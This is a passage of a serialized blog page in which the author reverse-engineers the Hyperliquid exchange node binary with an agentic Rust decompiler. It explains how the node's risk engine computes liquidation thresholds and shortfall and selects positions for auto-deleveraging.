[{"data":1,"prerenderedAt":168992},["ShallowReactive",2],{"blog-/blog/2026-06-22-hyperliquid-risk-engine":3,"featured-blog-posts":6804},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"author":11,"image":12,"isFeatured":16,"onBlogPage":16,"tags":17,"hideToc":16,"body":21,"_type":6798,"_id":6799,"_source":6800,"_file":6801,"_stem":6802,"_extension":6803},"/blog/2026-06-22-hyperliquid-risk-engine","blog",false,"","Auto reverse-engineering the Hyperliquid risk engine, with some agentic help","Perps allow traders to leverage beyond their collateral, until the market turns abruptly and losses are clawed back. We auto-reverse engineer Hyperliquid's risk engine to show how it ranks and deleverages winning users under the solvency–fairness–revenue trilemma.","2026-06-22T12:00:00.000Z","renato",{"src":13,"width":14,"height":15},"/posts/hyperliquid-risk-engine/title.png",1456,816,true,[18,19,20],"hyperliquid","reverse-engineering","defi",{"type":22,"children":23,"toc":6768},"root",[24,33,43,48,53,58,71,76,90,109,115,127,140,145,180,187,200,205,429,435,440,452,459,464,470,484,518,523,528,540,546,566,574,587,593,605,612,624,629,636,656,664,670,705,709,745,751,756,761,774,811,816,830,836,841,867,875,880,909,914,919,1257,1262,1267,1287,1315,1320,1333,1345,1350,1355,1361,1366,1371,1385,1390,1396,1424,1461,1473,1477,1482,1487,1493,1660,1696,1701,1707,1713,1909,1922,1927,1933,1954,1959,1965,1970,1975,1987,1992,1997,2003,2008,2013,2019,2025,2038,2073,2078,4695,4967,4972,6322,6327,6332,6344,6435,6447,6452,6458,6463,6472,6477,6485,6491,6525,6537,6545,6551,6557,6562,6570,6575,6580,6588,6600,6606,6611,6617,6628,6633,6639,6644,6649,6655,6660,6663,6668,6673,6679,6684,6696,6701,6706],{"type":25,"tag":26,"props":27,"children":29},"element","h2",{"id":28},"perpetuals",[30],{"type":31,"value":32},"text","Perpetuals",{"type":25,"tag":34,"props":35,"children":36},"blockquote",{},[37],{"type":25,"tag":38,"props":39,"children":40},"p",{},[41],{"type":31,"value":42},"A perpetual is a bet on a price, usually leveraged, settled in stablecoins, with no expiry: a row in the exchange's ledger, backed by margin (a fraction of the position's notional), where one side's gains are the other side's losses on the same book.",{"type":25,"tag":38,"props":44,"children":45},{},[46],{"type":31,"value":47},"What does that even have to do with reverse engineering?",{"type":25,"tag":26,"props":49,"children":50},{"id":18},[51],{"type":31,"value":52},"Hyperliquid",{"type":25,"tag":38,"props":54,"children":55},{},[56],{"type":31,"value":57},"Hyperliquid is a decentralized perpetuals exchange. It runs on its own\nL1, released publicly for anybody to run, but closed source.\nThe order book and the risk engine live on-chain, and thus inside of the L1 node binary, sitting between users and the shared\nbalance sheet they're all betting against.",{"type":25,"tag":38,"props":59,"children":60},{},[61,63,69],{"type":31,"value":62},"The node is tasked with a ",{"type":25,"tag":64,"props":65,"children":66},"em",{},[67],{"type":31,"value":68},"very hard problem",{"type":31,"value":70},": keeping the books balanced\nwhen leverage makes it possible for one side of every trade to lose more than their margin covers.",{"type":25,"tag":38,"props":72,"children":73},{},[74],{"type":31,"value":75},"Implementing a correct algorithm that solves this question is exactly what keeps the exchange solvent: this is also why peering into the actual implementation is very intriguing from a security standpoint.",{"type":25,"tag":38,"props":77,"children":78},{},[79,81,88],{"type":31,"value":80},"Beyond that, the ",{"type":25,"tag":82,"props":83,"children":85},"code",{"className":84},[],[86],{"type":31,"value":87},"hl-node",{"type":31,"value":89}," binary also offers an additional technical thrill: it is written in Rust, which is notoriously hard to reverse engineer.",{"type":25,"tag":38,"props":91,"children":92},{},[93,95,100,102,107],{"type":31,"value":94},"Armed with some curiosity, a good amount of ",{"type":25,"tag":64,"props":96,"children":97},{},[98],{"type":31,"value":99},"inference",{"type":31,"value":101},", and the right tooling, we'll take a deep dive using an ",{"type":25,"tag":64,"props":103,"children":104},{},[105],{"type":31,"value":106},"interactive interface",{"type":31,"value":108},", which will hopefully make the reconstructed code easier to understand for anybody, while also giving reverse engineers something to learn and a fun tool to play around with.",{"type":25,"tag":26,"props":110,"children":112},{"id":111},"the-million-dollar-question",[113],{"type":31,"value":114},"The Million Dollar Question",{"type":25,"tag":38,"props":116,"children":117},{},[118,120,125],{"type":31,"value":119},"Let's say a terrible trader opens a ",{"type":25,"tag":64,"props":121,"children":122},{},[123],{"type":31,"value":124},"50x",{"type":31,"value":126}," leveraged position on Hyperliquid. How does the exchange avoid losing money from their eventual downfall?",{"type":25,"tag":38,"props":128,"children":129},{},[130,132,138],{"type":31,"value":131},"When the market turns against them, the first check they would encounter is the traditional liquidation: their position is automatically put up on the market on the opposite side of the book. This happens whenever the equity of the position drops below the maintenance margin, which is spelled out exactly in the ",{"type":25,"tag":82,"props":133,"children":135},{"className":134},[],[136],{"type":31,"value":137},"compute_margin_requirement_by_mode",{"type":31,"value":139}," function.",{"type":25,"tag":38,"props":141,"children":142},{},[143],{"type":31,"value":144},"Let's consider the simplest case, that being isolated positions, which are processed in this branch:",{"type":25,"tag":146,"props":147,"children":148},"tip",{},[149],{"type":25,"tag":38,"props":150,"children":151},{},[152,154,159,161,170,172,178],{"type":31,"value":153},"To get a clearer view of the logic of reconstructed snippets, click on them to ",{"type":25,"tag":64,"props":155,"children":156},{},[157],{"type":31,"value":158},"click through",{"type":31,"value":160}," each action performed by ",{"type":25,"tag":162,"props":163,"children":167},"a",{"href":164,"rel":165},"https://github.com/renato-osec/patina-research",[166],"nofollow",[168],{"type":31,"value":169},"our Rust reverse engineering agent",{"type":31,"value":171},". Return to the regular view by clicking ",{"type":25,"tag":82,"props":173,"children":175},{"className":174},[],[176],{"type":31,"value":177},"T",{"type":31,"value":179},".",{"type":25,"tag":181,"props":182,"children":186},"bndb-viewer-embed",{"addr":183,"line-start":184,"line-end":185},"0x555556bb4d20","1","20",[],{"type":25,"tag":38,"props":188,"children":189},{},[190,192,198],{"type":31,"value":191},"The view here displays the reconstructed source code, through various stages starting from raw pseudo-C, with several verified agentic \"actions\" applied to it by our Rust decompiler. For example, you can see how some tentative Rust types, like ",{"type":25,"tag":82,"props":193,"children":195},{"className":194},[],[196],{"type":31,"value":197},"OptionUnitQty",{"type":31,"value":199},", are recovered: based on our harness, we can be sure that those are compatible with the original source types.",{"type":25,"tag":38,"props":201,"children":202},{},[203],{"type":31,"value":204},"As you can see, the position's equity is its isolated margin plus its own PnL, and the threshold reduces to:",{"type":25,"tag":206,"props":207,"children":208},"pre",{},[209],{"type":25,"tag":82,"props":210,"children":214},{"className":211},[212,213],"language-math","math-display",[215],{"type":25,"tag":216,"props":217,"children":220},"span",{"className":218},[219],"katex-display",[221],{"type":25,"tag":216,"props":222,"children":225},{"className":223},[224],"katex",[226],{"type":25,"tag":216,"props":227,"children":231},{"className":228,"ariaHidden":230},[229],"katex-html","true",[232,271],{"type":25,"tag":216,"props":233,"children":236},{"className":234},[235],"base",[237,243,254,260,267],{"type":25,"tag":216,"props":238,"children":242},{"className":239,"style":241},[240],"strut","height:1.0044em;vertical-align:-0.31em;",[],{"type":25,"tag":216,"props":244,"children":247},{"className":245},[246,31],"mord",[248],{"type":25,"tag":216,"props":249,"children":251},{"className":250},[246],[252],{"type":31,"value":253},"liq_equity",{"type":25,"tag":216,"props":255,"children":259},{"className":256,"style":258},[257],"mspace","margin-right:0.2778em;",[],{"type":25,"tag":216,"props":261,"children":264},{"className":262},[263],"mrel",[265],{"type":31,"value":266},"=",{"type":25,"tag":216,"props":268,"children":270},{"className":269,"style":258},[257],[],{"type":25,"tag":216,"props":272,"children":274},{"className":273},[235],[275,280],{"type":25,"tag":216,"props":276,"children":279},{"className":277,"style":278},[240],"height:2.3074em;vertical-align:-0.8804em;",[],{"type":25,"tag":216,"props":281,"children":283},{"className":282},[246],[284,290,424],{"type":25,"tag":216,"props":285,"children":289},{"className":286},[287,288],"mopen","nulldelimiter",[],{"type":25,"tag":216,"props":291,"children":294},{"className":292},[293],"mfrac",[295],{"type":25,"tag":216,"props":296,"children":300},{"className":297},[298,299],"vlist-t","vlist-t2",[301,412],{"type":25,"tag":216,"props":302,"children":305},{"className":303},[304],"vlist-r",[306,405],{"type":25,"tag":216,"props":307,"children":311},{"className":308,"style":310},[309],"vlist","height:1.427em;",[312,358,372],{"type":25,"tag":216,"props":313,"children":315},{"style":314},"top:-2.314em;",[316,322],{"type":25,"tag":216,"props":317,"children":321},{"className":318,"style":320},[319],"pstrut","height:3em;",[],{"type":25,"tag":216,"props":323,"children":325},{"className":324},[246],[326,332,337,344,348],{"type":25,"tag":216,"props":327,"children":329},{"className":328},[246],[330],{"type":31,"value":331},"2",{"type":25,"tag":216,"props":333,"children":336},{"className":334,"style":335},[257],"margin-right:0.2222em;",[],{"type":25,"tag":216,"props":338,"children":341},{"className":339},[340],"mbin",[342],{"type":31,"value":343},"⋅",{"type":25,"tag":216,"props":345,"children":347},{"className":346,"style":335},[257],[],{"type":25,"tag":216,"props":349,"children":351},{"className":350},[246,31],[352],{"type":25,"tag":216,"props":353,"children":355},{"className":354},[246],[356],{"type":31,"value":357},"leverage",{"type":25,"tag":216,"props":359,"children":361},{"style":360},"top:-3.23em;",[362,366],{"type":25,"tag":216,"props":363,"children":365},{"className":364,"style":320},[319],[],{"type":25,"tag":216,"props":367,"children":371},{"className":368,"style":370},[369],"frac-line","border-bottom-width:0.04em;",[],{"type":25,"tag":216,"props":373,"children":375},{"style":374},"top:-3.677em;",[376,380],{"type":25,"tag":216,"props":377,"children":379},{"className":378,"style":320},[319],[],{"type":25,"tag":216,"props":381,"children":383},{"className":382},[246],[384,390,400],{"type":25,"tag":216,"props":385,"children":387},{"className":386},[246],[388],{"type":31,"value":389},"∣",{"type":25,"tag":216,"props":391,"children":393},{"className":392},[246,31],[394],{"type":25,"tag":216,"props":395,"children":397},{"className":396},[246],[398],{"type":31,"value":399},"notional",{"type":25,"tag":216,"props":401,"children":403},{"className":402},[246],[404],{"type":31,"value":389},{"type":25,"tag":216,"props":406,"children":409},{"className":407},[408],"vlist-s",[410],{"type":31,"value":411},"​",{"type":25,"tag":216,"props":413,"children":415},{"className":414},[304],[416],{"type":25,"tag":216,"props":417,"children":420},{"className":418,"style":419},[309],"height:0.8804em;",[421],{"type":25,"tag":216,"props":422,"children":423},{},[],{"type":25,"tag":216,"props":425,"children":428},{"className":426},[427,288],"mclose",[],{"type":25,"tag":26,"props":430,"children":432},{"id":431},"what-if-nobody-wants-to-buy-the-position",[433],{"type":31,"value":434},"What If Nobody Wants to Buy the Position?",{"type":25,"tag":38,"props":436,"children":437},{},[438],{"type":31,"value":439},"The market order from the previous section is just a regular order, and it still needs somebody on the other side of the book to fill it.\nIf the book is thin or the move was violent enough that every passive bid got swept, only part of it (or none) gets filled and equity will possibly keep on going down.",{"type":25,"tag":38,"props":441,"children":442},{},[443,445,450],{"type":31,"value":444},"When that happens, the exchange is basically left with a ",{"type":25,"tag":64,"props":446,"children":447},{},[448],{"type":31,"value":449},"hot potato",{"type":31,"value":451}," to get rid of: what should it even do with the debt?",{"type":25,"tag":453,"props":454,"children":456},"h1",{"id":455},"the-risk-engine",[457],{"type":31,"value":458},"The Risk Engine",{"type":25,"tag":38,"props":460,"children":461},{},[462],{"type":31,"value":463},"And now we circle back to the risk engine: in order to keep all of these terrible traders from driving the system into ruin, we need some automatic way to prevent and clear bad debt.",{"type":25,"tag":26,"props":465,"children":467},{"id":466},"clearing-up-bad-debt",[468],{"type":31,"value":469},"Clearing Up Bad Debt",{"type":25,"tag":38,"props":471,"children":472},{},[473,475,482],{"type":31,"value":474},"The ",{"type":25,"tag":162,"props":476,"children":479},{"href":477,"rel":478},"https://hyperliquid.gitbook.io/hyperliquid-docs/trading/auto-deleveraging",[166],[480],{"type":31,"value":481},"Hyperliquid docs",{"type":31,"value":483}," explain that positions below 2/3 maintenance margin are backstop-liquidated into the HLP liquidator vault. When even that can't keep the book solvent, auto-deleveraging closes the position against opposing traders. What does that even mean?",{"type":25,"tag":38,"props":485,"children":486},{},[487,489,500,502,508,510,516],{"type":31,"value":488},"To get a better idea of what's going on here, we turn to the binary itself and trace the actual logic. A simple testnet sync gives us a lot of context: within the node's ABCI state, we can see a pretty complex structure named ",{"type":25,"tag":162,"props":490,"children":493},{"href":491,"rel":492},"https://hyperliquid.gitbook.io/hyperliquid-docs/hypercore/clearinghouse",[166],[494],{"type":25,"tag":82,"props":495,"children":497},{"className":496},[],[498],{"type":31,"value":499},"Clearinghouse",{"type":31,"value":501},", a struct containing all liquidation-related info, nested within a bigger ",{"type":25,"tag":82,"props":503,"children":505},{"className":504},[],[506],{"type":31,"value":507},"Exchange",{"type":31,"value":509}," data structure. This is an example of what it might hold when serialized as ",{"type":25,"tag":82,"props":511,"children":513},{"className":512},[],[514],{"type":31,"value":515},"MessagePack",{"type":31,"value":517}," at runtime.",{"type":25,"tag":38,"props":519,"children":520},{},[521],{"type":31,"value":522},"This data will come in handy both for us and the agent.",{"type":25,"tag":524,"props":525,"children":527},"file-download",{"path":526},"/posts/hyperliquid-risk-engine/clearinghouse.json",[],{"type":25,"tag":38,"props":529,"children":530},{},[531,533,538],{"type":31,"value":532},"Now, when does the risk engine actually check positions? We can answer that question by playing around with xrefs starting from the known field strings in ",{"type":25,"tag":82,"props":534,"children":536},{"className":535},[],[537],{"type":31,"value":499},{"type":31,"value":539},". Some renaming later, we can infer something like this:",{"type":25,"tag":181,"props":541,"children":545},{"source":542,"target":543,"direction":544},"sub_555556262490","clearinghouse_adl_orchestrator","forward",[],{"type":25,"tag":38,"props":547,"children":548},{},[549,551,556,558,564],{"type":31,"value":550},"We have one huge function handling all clearinghouse operations, which we call ",{"type":25,"tag":82,"props":552,"children":554},{"className":553},[],[555],{"type":31,"value":543},{"type":31,"value":557},". It is invoked at the end of each block by a top-level method (called indirectly elsewhere, most likely a trait method) that we call ",{"type":25,"tag":82,"props":559,"children":561},{"className":560},[],[562],{"type":31,"value":563},"exchange_end_block",{"type":31,"value":565},". So, at the end of each block we run some checks.",{"type":25,"tag":146,"props":567,"children":568},{},[569],{"type":25,"tag":38,"props":570,"children":571},{},[572],{"type":31,"value":573},"Click on any address or line on the left side to get a detailed view of the decompilation or reconstructed source.",{"type":25,"tag":38,"props":575,"children":576},{},[577,579,585],{"type":31,"value":578},"ADL is meant as an emergency measure; unlike liquidations, it is not always operational. Note the branch on the recovered ",{"type":25,"tag":82,"props":580,"children":582},{"className":581},[],[583],{"type":31,"value":584},"clearinghouse.perform_auto_deleveraging",{"type":31,"value":586}," flag.",{"type":25,"tag":181,"props":588,"children":592},{"addr":589,"line-start":590,"line-end":591},"0x555556ac3850","3290","3301",[],{"type":25,"tag":38,"props":594,"children":595},{},[596,598,603],{"type":31,"value":597},"Most importantly, for it to act it must actually be needed. What does that mean according to the ",{"type":25,"tag":82,"props":599,"children":601},{"className":600},[],[602],{"type":31,"value":499},{"type":31,"value":604},"?",{"type":25,"tag":606,"props":607,"children":609},"h3",{"id":608},"threshold-condition",[610],{"type":31,"value":611},"Threshold Condition",{"type":25,"tag":38,"props":613,"children":614},{},[615,617,622],{"type":31,"value":616},"The natural connection between liquidations and ADL is ",{"type":25,"tag":64,"props":618,"children":619},{},[620],{"type":31,"value":621},"shortfall",{"type":31,"value":623},": by how much a position, or the entire system (!), is underwater.",{"type":25,"tag":38,"props":625,"children":626},{},[627],{"type":31,"value":628},"If we could liquidate every position in time against willing buyers of the debt, there would be no systemic shortfall; ADL is triggered whenever that's not the case.",{"type":25,"tag":630,"props":631,"children":633},"h4",{"id":632},"who-is-underwater",[634],{"type":31,"value":635},"Who Is Underwater?",{"type":25,"tag":38,"props":637,"children":638},{},[639,641,646,648,654],{"type":31,"value":640},"In order to determine that shortfall (or sum of bad debt), we process a useful tree of losing positions, built at the end of each block and passed to the ",{"type":25,"tag":82,"props":642,"children":644},{"className":643},[],[645],{"type":31,"value":543},{"type":31,"value":647},", starting from all user positions, which are stored in ",{"type":25,"tag":82,"props":649,"children":651},{"className":650},[],[652],{"type":31,"value":653},"clearinghouse.user_states",{"type":31,"value":655},", as we can also see from the serialization.",{"type":25,"tag":146,"props":657,"children":658},{},[659],{"type":25,"tag":38,"props":660,"children":661},{},[662],{"type":31,"value":663},"A graph can also branch, you know? Click around to view all possible paths from one function to another.",{"type":25,"tag":181,"props":665,"children":669},{"source":666,"target":563,"direction":667,"path":668},"adl_init_user_position_iterators","backward","exchange_end_block,build_adl_candidate_set,adl_init_user_position_iterators",[],{"type":25,"tag":38,"props":671,"children":672},{},[673,674,679,681,687,689,695,697,703],{"type":31,"value":474},{"type":25,"tag":82,"props":675,"children":677},{"className":676},[],[678],{"type":31,"value":666},{"type":31,"value":680}," essentially turns that into an ",{"type":25,"tag":82,"props":682,"children":684},{"className":683},[],[685],{"type":31,"value":686},"Iter",{"type":31,"value":688},", then, inside of ",{"type":25,"tag":82,"props":690,"children":692},{"className":691},[],[693],{"type":31,"value":694},"build_adl_candidate_set",{"type":31,"value":696}," each entry is accounted either as a cross or isolated position, depending on the value of the ",{"type":25,"tag":82,"props":698,"children":700},{"className":699},[],[701],{"type":31,"value":702},"AdlIterEntry",{"type":31,"value":704}," field.",{"type":25,"tag":181,"props":706,"children":708},{"type-name":707},"AdlIterContext",[],{"type":25,"tag":38,"props":710,"children":711},{},[712,714,720,722,728,730,736,738,743],{"type":31,"value":713},"Note that in storage, ",{"type":25,"tag":82,"props":715,"children":717},{"className":716},[],[718],{"type":31,"value":719},"Isolated",{"type":31,"value":721}," positions have their own independent ",{"type":25,"tag":82,"props":723,"children":725},{"className":724},[],[726],{"type":31,"value":727},"Entry",{"type":31,"value":729}," in the position iterators, and ",{"type":25,"tag":82,"props":731,"children":733},{"className":732},[],[734],{"type":31,"value":735},"Cross",{"type":31,"value":737}," positions have a single common ",{"type":25,"tag":82,"props":739,"children":741},{"className":740},[],[742],{"type":31,"value":727},{"type":31,"value":744},", which will be spread across several perps. We will see many more branches to handle the two kinds of positions.",{"type":25,"tag":181,"props":746,"children":750},{"addr":747,"line-start":748,"line-end":749},"0x555556266b10","152","163",[],{"type":25,"tag":38,"props":752,"children":753},{},[754],{"type":31,"value":755},"Ultimately, we get an iterator of underwater users filtered with the following code path, meaning they couldn't be liquidated by the end of the block according to the earlier threshold.",{"type":25,"tag":181,"props":757,"children":760},{"addr":589,"line-start":758,"line-end":759},"506","527",[],{"type":25,"tag":38,"props":762,"children":763},{},[764,766],{"type":31,"value":765},"After iterating over users, if the total losses are less than a predefined constant (hardcoded to $5M in the testnet state), we spare cross-margin positions and log ",{"type":25,"tag":767,"props":768,"children":771},"bndb-xref",{"lines":769,"addrs":770},"1-2","0x555556ac3e18-0x555556ac3e18",[772],{"type":31,"value":773},"Not performing auto-deleveraging because shortfall={} is acceptable.",{"type":25,"tag":38,"props":775,"children":776},{},[777,779,785,787,793,795,801,803,809],{"type":31,"value":778},"Note that this insurance fund is not applied to every asset: while this isn't documented anywhere, markets referred to as ",{"type":25,"tag":82,"props":780,"children":782},{"className":781},[],[783],{"type":31,"value":784},"only_isolated",{"type":31,"value":786}," (or ",{"type":25,"tag":82,"props":788,"children":790},{"className":789},[],[791],{"type":31,"value":792},"strict_isolated",{"type":31,"value":794}," in MessagePack dumps) are added to a separate queue, ",{"type":25,"tag":82,"props":796,"children":798},{"className":797},[],[799],{"type":31,"value":800},"deferred_queue",{"type":31,"value":802},", which triggers ADL regardless of the system's ",{"type":25,"tag":82,"props":804,"children":806},{"className":805},[],[807],{"type":31,"value":808},"total_shortfall",{"type":31,"value":810},". This is dictated by this branch.",{"type":25,"tag":181,"props":812,"children":815},{"addr":589,"line-start":813,"line-end":814},"211","243",[],{"type":25,"tag":38,"props":817,"children":818},{},[819,821,828],{"type":31,"value":820},"Very interestingly, some of the assets that have this flag, at least on testnet, include HYPE (and other relevant tokens like ZRO, as well as JELLYJELLY from the ",{"type":25,"tag":162,"props":822,"children":825},{"href":823,"rel":824},"https://info.arkm.com/research/jellyjelly-exploit-on-hyperliquid",[166],[826],{"type":31,"value":827},"March 2025 incident",{"type":31,"value":829},"). Historical metadata for Hyperliquid is very hard to come by, so take this with a pinch of salt when thinking about mainnet.",{"type":25,"tag":630,"props":831,"children":833},{"id":832},"how-do-we-get-rid-of-debt",[834],{"type":31,"value":835},"How Do We Get Rid of Debt?",{"type":25,"tag":38,"props":837,"children":838},{},[839],{"type":31,"value":840},"Now we know whenever we have shortfall. What is to be done in that case? This is where different risk engines make different design choices: Hyperliquid chooses to apply a queue-based ADL (auto-deleveraging), meaning they forcefully close some winning positions in order to clear the debt of the losing traders.",{"type":25,"tag":38,"props":842,"children":843},{},[844,846,851,853,858,860,865],{"type":31,"value":845},"Thus, if the debt is insurmountable, the ",{"type":25,"tag":82,"props":847,"children":849},{"className":848},[],[850],{"type":31,"value":800},{"type":31,"value":852}," is overwritten by all the users marked by ",{"type":25,"tag":82,"props":854,"children":856},{"className":855},[],[857],{"type":31,"value":694},{"type":31,"value":859},", otherwise we keep it and only holders of underwater ",{"type":25,"tag":82,"props":861,"children":863},{"className":862},[],[864],{"type":31,"value":792},{"type":31,"value":866}," positions from the earlier loop are considered for ADL.",{"type":25,"tag":146,"props":868,"children":869},{},[870],{"type":25,"tag":38,"props":871,"children":872},{},[873],{"type":31,"value":874},"Note how verbose a simple key lookup can be when compiled in Rust.",{"type":25,"tag":181,"props":876,"children":879},{"addr":589,"line-start":877,"line-end":878},"523","526",[],{"type":25,"tag":38,"props":881,"children":882},{},[883,885,891,893,899,901,907],{"type":31,"value":884},"For each underwater position, we do a ",{"type":25,"tag":767,"props":886,"children":888},{"addrs":887},"0x555556ac42ad-0x555556ac42be",[889],{"type":31,"value":890},"B-tree lookup",{"type":31,"value":892}," on ",{"type":25,"tag":82,"props":894,"children":896},{"className":895},[],[897],{"type":31,"value":898},"clearinghouse.user_states[position.user]",{"type":31,"value":900},", adding them to a ",{"type":25,"tag":82,"props":902,"children":904},{"className":903},[],[905],{"type":31,"value":906},"Vec",{"type":31,"value":908}," of users (you would be amazed at how long the compilation of such a simple statement is). Also note the branch below, again on cross and isolated margin positions:",{"type":25,"tag":181,"props":910,"children":913},{"addr":589,"line-start":911,"line-end":912},"635","658",[],{"type":25,"tag":38,"props":915,"children":916},{},[917],{"type":31,"value":918},"The logic for cross margin positions is more complicated, because we're essentially asking the question of how to split a bankrupt user's total shortfall across their individual positions, so that we can absorb the right proportion of each position, which logically should be:",{"type":25,"tag":206,"props":920,"children":921},{},[922],{"type":25,"tag":82,"props":923,"children":925},{"className":924},[212,213],[926],{"type":25,"tag":216,"props":927,"children":929},{"className":928},[219],[930],{"type":25,"tag":216,"props":931,"children":933},{"className":932},[224],[934],{"type":25,"tag":216,"props":935,"children":937},{"className":936,"ariaHidden":230},[229],[938],{"type":25,"tag":216,"props":939,"children":941},{"className":940},[235],[942,947],{"type":25,"tag":216,"props":943,"children":946},{"className":944,"style":945},[240],"height:4.1904em;vertical-align:-1.8452em;",[],{"type":25,"tag":216,"props":948,"children":950},{"className":949},[246],[951],{"type":25,"tag":216,"props":952,"children":955},{"className":953},[954],"mtable",[956,1036],{"type":25,"tag":216,"props":957,"children":960},{"className":958},[959],"col-align-r",[961],{"type":25,"tag":216,"props":962,"children":964},{"className":963},[298,299],[965,1024],{"type":25,"tag":216,"props":966,"children":968},{"className":967},[304],[969,1019],{"type":25,"tag":216,"props":970,"children":973},{"className":971,"style":972},[309],"height:2.3452em;",[974,997],{"type":25,"tag":216,"props":975,"children":977},{"style":976},"top:-4.3452em;",[978,983],{"type":25,"tag":216,"props":979,"children":982},{"className":980,"style":981},[319],"height:3.3944em;",[],{"type":25,"tag":216,"props":984,"children":986},{"className":985},[246],[987],{"type":25,"tag":216,"props":988,"children":990},{"className":989},[246,31],[991],{"type":25,"tag":216,"props":992,"children":994},{"className":993},[246],[995],{"type":31,"value":996},"position_weight",{"type":25,"tag":216,"props":998,"children":1000},{"style":999},"top:-2.2092em;",[1001,1005],{"type":25,"tag":216,"props":1002,"children":1004},{"className":1003,"style":981},[319],[],{"type":25,"tag":216,"props":1006,"children":1008},{"className":1007},[246],[1009],{"type":25,"tag":216,"props":1010,"children":1012},{"className":1011},[246,31],[1013],{"type":25,"tag":216,"props":1014,"children":1016},{"className":1015},[246],[1017],{"type":31,"value":1018},"position_adl_amount",{"type":25,"tag":216,"props":1020,"children":1022},{"className":1021},[408],[1023],{"type":31,"value":411},{"type":25,"tag":216,"props":1025,"children":1027},{"className":1026},[304],[1028],{"type":25,"tag":216,"props":1029,"children":1032},{"className":1030,"style":1031},[309],"height:1.8452em;",[1033],{"type":25,"tag":216,"props":1034,"children":1035},{},[],{"type":25,"tag":216,"props":1037,"children":1040},{"className":1038},[1039],"col-align-l",[1041],{"type":25,"tag":216,"props":1042,"children":1044},{"className":1043},[298,299],[1045,1246],{"type":25,"tag":216,"props":1046,"children":1048},{"className":1047},[304],[1049,1241],{"type":25,"tag":216,"props":1050,"children":1052},{"className":1051,"style":972},[309],[1053,1181],{"type":25,"tag":216,"props":1054,"children":1055},{"style":976},[1056,1060],{"type":25,"tag":216,"props":1057,"children":1059},{"className":1058,"style":981},[319],[],{"type":25,"tag":216,"props":1061,"children":1063},{"className":1062},[246],[1064,1068,1072,1077,1081],{"type":25,"tag":216,"props":1065,"children":1067},{"className":1066},[246],[],{"type":25,"tag":216,"props":1069,"children":1071},{"className":1070,"style":258},[257],[],{"type":25,"tag":216,"props":1073,"children":1075},{"className":1074},[263],[1076],{"type":31,"value":266},{"type":25,"tag":216,"props":1078,"children":1080},{"className":1079,"style":258},[257],[],{"type":25,"tag":216,"props":1082,"children":1084},{"className":1083},[246],[1085,1089,1177],{"type":25,"tag":216,"props":1086,"children":1088},{"className":1087},[287,288],[],{"type":25,"tag":216,"props":1090,"children":1092},{"className":1091},[293],[1093],{"type":25,"tag":216,"props":1094,"children":1096},{"className":1095},[298,299],[1097,1165],{"type":25,"tag":216,"props":1098,"children":1100},{"className":1099},[304],[1101,1160],{"type":25,"tag":216,"props":1102,"children":1105},{"className":1103,"style":1104},[309],"height:1.3944em;",[1106,1127,1138],{"type":25,"tag":216,"props":1107,"children":1108},{"style":314},[1109,1113],{"type":25,"tag":216,"props":1110,"children":1112},{"className":1111,"style":320},[319],[],{"type":25,"tag":216,"props":1114,"children":1116},{"className":1115},[246],[1117],{"type":25,"tag":216,"props":1118,"children":1120},{"className":1119},[246,31],[1121],{"type":25,"tag":216,"props":1122,"children":1124},{"className":1123},[246],[1125],{"type":31,"value":1126},"total_cross_notional",{"type":25,"tag":216,"props":1128,"children":1129},{"style":360},[1130,1134],{"type":25,"tag":216,"props":1131,"children":1133},{"className":1132,"style":320},[319],[],{"type":25,"tag":216,"props":1135,"children":1137},{"className":1136,"style":370},[369],[],{"type":25,"tag":216,"props":1139,"children":1141},{"style":1140},"top:-3.7em;",[1142,1146],{"type":25,"tag":216,"props":1143,"children":1145},{"className":1144,"style":320},[319],[],{"type":25,"tag":216,"props":1147,"children":1149},{"className":1148},[246],[1150],{"type":25,"tag":216,"props":1151,"children":1153},{"className":1152},[246,31],[1154],{"type":25,"tag":216,"props":1155,"children":1157},{"className":1156},[246],[1158],{"type":31,"value":1159},"position_notional",{"type":25,"tag":216,"props":1161,"children":1163},{"className":1162},[408],[1164],{"type":31,"value":411},{"type":25,"tag":216,"props":1166,"children":1168},{"className":1167},[304],[1169],{"type":25,"tag":216,"props":1170,"children":1173},{"className":1171,"style":1172},[309],"height:0.996em;",[1174],{"type":25,"tag":216,"props":1175,"children":1176},{},[],{"type":25,"tag":216,"props":1178,"children":1180},{"className":1179},[427,288],[],{"type":25,"tag":216,"props":1182,"children":1183},{"style":999},[1184,1188],{"type":25,"tag":216,"props":1185,"children":1187},{"className":1186,"style":981},[319],[],{"type":25,"tag":216,"props":1189,"children":1191},{"className":1190},[246],[1192,1196,1200,1205,1209,1219,1223,1228,1232],{"type":25,"tag":216,"props":1193,"children":1195},{"className":1194},[246],[],{"type":25,"tag":216,"props":1197,"children":1199},{"className":1198,"style":258},[257],[],{"type":25,"tag":216,"props":1201,"children":1203},{"className":1202},[263],[1204],{"type":31,"value":266},{"type":25,"tag":216,"props":1206,"children":1208},{"className":1207,"style":258},[257],[],{"type":25,"tag":216,"props":1210,"children":1212},{"className":1211},[246,31],[1213],{"type":25,"tag":216,"props":1214,"children":1216},{"className":1215},[246],[1217],{"type":31,"value":1218},"user_shortfall",{"type":25,"tag":216,"props":1220,"children":1222},{"className":1221,"style":335},[257],[],{"type":25,"tag":216,"props":1224,"children":1226},{"className":1225},[340],[1227],{"type":31,"value":343},{"type":25,"tag":216,"props":1229,"children":1231},{"className":1230,"style":335},[257],[],{"type":25,"tag":216,"props":1233,"children":1235},{"className":1234},[246,31],[1236],{"type":25,"tag":216,"props":1237,"children":1239},{"className":1238},[246],[1240],{"type":31,"value":996},{"type":25,"tag":216,"props":1242,"children":1244},{"className":1243},[408],[1245],{"type":31,"value":411},{"type":25,"tag":216,"props":1247,"children":1249},{"className":1248},[304],[1250],{"type":25,"tag":216,"props":1251,"children":1253},{"className":1252,"style":1031},[309],[1254],{"type":25,"tag":216,"props":1255,"children":1256},{},[],{"type":25,"tag":38,"props":1258,"children":1259},{},[1260],{"type":31,"value":1261},"We do that here:",{"type":25,"tag":181,"props":1263,"children":1266},{"addr":589,"line-start":1264,"line-end":1265},"828","981",[],{"type":25,"tag":38,"props":1268,"children":1269},{},[1270,1271,1277,1279,1285],{"type":31,"value":474},{"type":25,"tag":767,"props":1272,"children":1274},{"lines":1273},"77-79",[1275],{"type":31,"value":1276},"inner loop",{"type":31,"value":1278}," above spans all ",{"type":25,"tag":82,"props":1280,"children":1282},{"className":1281},[],[1283],{"type":31,"value":1284},"(asset_idx, direction)",{"type":31,"value":1286}," held in the cross margin 